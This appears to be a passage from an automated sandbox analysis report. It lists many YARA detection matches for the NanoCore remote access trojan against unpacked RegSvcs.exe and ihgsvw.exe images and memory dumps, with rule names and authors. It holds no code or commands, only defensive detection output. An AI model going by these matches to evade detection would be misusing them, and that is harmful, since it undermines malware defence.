      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
